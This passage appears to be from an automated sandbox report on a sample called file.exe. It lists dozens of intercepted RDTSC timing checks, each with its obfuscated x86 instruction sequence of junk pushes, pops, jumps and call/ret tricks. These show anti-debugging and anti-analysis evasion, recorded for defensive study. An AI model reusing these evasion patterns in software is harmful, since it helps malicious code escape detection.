                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F155E second address: 10F1562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1AF3 second address: 10F1AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1AF9 second address: 10F1AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1C15 second address: 10F1C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1C19 second address: 10F1C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1EBE second address: 10F1EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1EC2 second address: 10F1EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1EC6 second address: 10F1ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1ED1 second address: 10F1EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2E044F25F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1EE0 second address: 10F1EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3866 second address: 10F387F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F2E044F25FDh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B792A second address: 10B7930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4F44 second address: 10F4F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4F48 second address: 10F4F75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2E050A57CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jne 00007F2E050A57C8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F2E050A57C6h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF48 second address: 10BAF6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2E044F25FEh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2E044F25FFh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF6B second address: 10BAF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF6F second address: 10BAF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF75 second address: 10BAF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF82 second address: 10BAF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 js 00007F2E044F2602h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF91 second address: 10BAF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF97 second address: 10BAF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF9B second address: 10BAFA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F766F second address: 10F7675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7675 second address: 10F7690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007F2E050A57C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7813 second address: 10F7819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C0064 second address: 10C0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE056 second address: 10FE06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F2E044F2600h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE06F second address: 10FE093 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E050A57C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2E050A57D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE4A1 second address: 10FE4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE7D6 second address: 10FE7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE930 second address: 10FE934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE934 second address: 10FE953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE953 second address: 10FE958 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFA6B second address: 10FFA70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11005BE second address: 11005CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1100B48 second address: 1100B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1100B52 second address: 1100B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1101087 second address: 11010E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, edx 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F2E050A57C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 movsx edi, dx 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d mov edi, esi 0x0000002f sub dword ptr [ebp+122D2147h], esi 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 jmp 00007F2E050A57CDh 0x0000003c push eax 0x0000003d pushad 0x0000003e ja 00007F2E050A57CCh 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102AA3 second address: 1102B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F2E044F2609h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov di, dx 0x00000013 push 00000000h 0x00000015 jmp 00007F2E044F2602h 0x0000001a add edi, 5A00D4B1h 0x00000020 push 00000000h 0x00000022 jmp 00007F2E044F25FEh 0x00000027 xchg eax, ebx 0x00000028 jnc 00007F2E044F260Ch 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jo 00007F2E044F25FCh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102B1C second address: 1102B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102B20 second address: 1102B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2E044F25F6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105481 second address: 110548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2E050A57C6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110548C second address: 11054B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2E044F25F8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F2E044F2605h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11094C7 second address: 11094CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106856 second address: 110685A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110685A second address: 1106860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11094CC second address: 11094D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106860 second address: 1106879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57D5h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109976 second address: 1109980 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2E044F25FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109980 second address: 110998B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110998B second address: 1109A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 nop 0x00000007 call 00007F2E044F2603h 0x0000000c add ebx, dword ptr [ebp+122D2B51h] 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F2E044F25F8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F2E044F25F8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F2E044F2603h 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109A04 second address: 1109A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109A16 second address: 1109A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA52 second address: 110BA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2E050A57C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA5C second address: 110BA60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE4E7 second address: 10BE4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F2E050A57C6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE4F3 second address: 10BE4FF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2E044F25F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110809 second address: 111080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111B4D second address: 1111B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111B51 second address: 1111B72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2E050A57D7h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111B72 second address: 1111B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112AB6 second address: 1112ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F2E050A57C8h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112ACA second address: 1112ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116929 second address: 1116977 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E050A57C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F2E050A57C8h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F2E050A57C8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 mov di, 777Bh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 jmp 00007F2E050A57CAh 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116977 second address: 111697D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111697D second address: 1116989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116989 second address: 111698D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119CB6 second address: 1119D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007F2E050A57D0h 0x00000010 nop 0x00000011 or dword ptr [ebp+122D34D5h], edx 0x00000017 push 00000000h 0x00000019 cmc 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+12464906h], eax 0x00000022 or edi, dword ptr [ebp+1245CBCEh] 0x00000028 xchg eax, esi 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007F2E050A57D8h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114A2F second address: 1114A39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116B04 second address: 1116B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116B08 second address: 1116B0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116B0E second address: 1116B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116C27 second address: 1116C2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118ED6 second address: 1118EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AAA3 second address: 111AABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F2E044F25FCh 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AABE second address: 111AB0A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2E050A57C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F2E050A57C8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov di, 1634h 0x0000002a mov edi, dword ptr [ebp+122D22B5h] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1849h], ecx 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D22BDh], esi 0x00000040 xchg eax, esi 0x00000041 push ecx 0x00000042 jo 00007F2E050A57CCh 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BC2F second address: 111BCD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007F2E044F2608h 0x00000011 pop ecx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1CFFh], ebx 0x00000019 mov dword ptr [ebp+122D1829h], esi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F2E044F25F8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D2147h], ebx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007F2E044F25F8h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 00000015h 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d push eax 0x0000005e pushad 0x0000005f jmp 00007F2E044F2608h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BE11 second address: 111BE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BE15 second address: 111BE19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F631 second address: 111F637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112258D second address: 1122591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1122591 second address: 112259C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126F63 second address: 1126F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A84A second address: 112A850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A850 second address: 112A855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A9D9 second address: 112A9DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A9DD second address: 112A9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A9E3 second address: 112AA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E050A57D0h 0x00000008 jmp 00007F2E050A57D8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F2E050A57CBh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2E050A57D7h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112AA3B second address: 112AA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2E044F2606h 0x00000015 rdtsc
